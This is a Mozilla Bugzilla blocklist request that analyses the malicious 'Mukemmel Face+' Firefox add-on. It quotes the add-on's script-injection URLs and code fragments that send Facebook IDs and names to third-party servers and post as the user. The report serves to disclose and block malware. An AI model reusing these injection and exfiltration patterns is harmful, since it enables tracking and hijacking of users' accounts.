Closed
Bug 748993
Opened 12 years ago
Closed 12 years ago
Malicious "Mukemmel Face+" add-on
Categories
(Toolkit :: Blocklist Policy Requests, defect)
Toolkit
Blocklist Policy Requests
Tracking
()
RESOLVED
FIXED
People
(Reporter: mhammell, Assigned: jorgev)
Details
Attachments
(1 file)
|
90.12 KB,
application/octet-stream
|
Details |
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.163 Safari/535.19
Steps to reproduce:
Downloaded add-on from www.mukemmelface.com/firefox.html
Actual results:
loads "adobeflashplayer.js" from XPI
code is based on the less malicious "SocialFixer" plugin
looks to see if it's on a Facebook or Google domain
uses HTML5 local storage plus cookies to maintain config/state
injects a <script> tag to load http://hadi.mukemmelface.com/mukemmelface.js?amtasak=<random_num> when on Facebook
or, injects a <script> tag to load http://hadi.mukemmelface.com/g.js?amtasak=<random_num> when on Google
mukemmelface.js:
loads your public details into the DOM via a call to graph.facebook.com/<uid>&callback=cins
contains the spam URL http://hadi.mukemmelface.com/reklam.html
injects either a <script> tag to load http://hadi.mukemmelface.com/offline.js?cins=<1|2>&amtasak=<uid>&x=<random_number>
... or a <script> tag to load http://hadi.mukemmelface.com/zaza.js?cins=<1|2>&amtasak=<uid>&x=<random_number>
and a <script> tag to load http://gator1620.hostgator.com/~vazgec/1333458695713783.jpg
g.js:
empty at the time the analysis was done
offline.js / zaza.js (same file):
JS to install a font
1333458695713783.jpg:
not an image file, but javascript
sends your FB UID to http://get.buzzzapps.com/xpi/lechat/get_th.php?id_user="+FB_UID+"&ck="+userKey+"&me="+FB_UID (since this loads on every Facebook page load, it also sends the current Facebook URL you're viewing as a referrer, allowing them to track you on Facebook)
has the ability to send your FB UID and name to http://set.buzzzapps.com/xpi/lechat/register.php?name='+FB_NAME+'&fbid='+FB_UID
sends your FB UID to http://sp1.buzzzapps.com/sp/upload.php?id_user='+FB_UID+'
sends your FB UID to http://ads2.buzzzapps.com/xpi/css/'+a+'/'+FB_UID+'.css
makes an Ajax request to http://cdn.mukemmelface.com/MukemmelFace.js?amtasak=<random_number>
injects ads by appending to the FB ad unit via "<iframe id='"+pubid+"_fr' src='"+reklam+"?umtt="+utma+"&umte="+USER_TYPE+"&ub="+SEXE+"' style='border:0px;margin-left:0px' width='230' height='620' scrolling='no' ></iframe>"
sends your name and FB UID when you submit a bug report via http://set.buzzzapps.com/xpi/lechat/bugreport.php?message="&name="+FB_NAME+&fbid="+FB_UID
sends your name and FB UID to http://get.buzzzapps.com/xpi/lechat/get_all.php?id_post="+tableau_aid+"&id_user="+FB_UID+
posts details of what you do on Facebook via
function setPost(aid,what){
ajaxeur("http://set.buzzzapps.com/xpi/lechat/set.php?id_post="+aid+"&id_user="+FB_UID
+"&type="+what,vide, function(){});
}
function unsetPost(aid,what){
ajaxeur("http://set.buzzzapps.com/xpi/lechat/unset.php?id_post="+aid+"&id_user="+FB_UID
+"&type="+what,vide, function(){});
}
posts status updates to your Timeline / Wall
Expected results:
It shouldn't post your Facebook account information to a 3rd party server or post as you on Facebook without your consent.
|
Assignee | |
Comment 1•12 years ago
|
||
ID: {45147e67-4020-47e2-8f7a-55464fb535aa}Assignee: nobody → jorge
Status: UNCONFIRMED → NEW
Ever confirmed: true
|
|
Assignee | |
Comment 2•12 years ago
|
||
Blocked: https://addons.mozilla.org/en-US/firefox/blocked/i86
Status: NEW → RESOLVED
Closed: 12 years ago
Resolution: --- → FIXED
|
||
Updated•8 years ago
|
Product: addons.mozilla.org → Toolkit
You need to log in
before you can comment on or make changes to this bug.
Description
•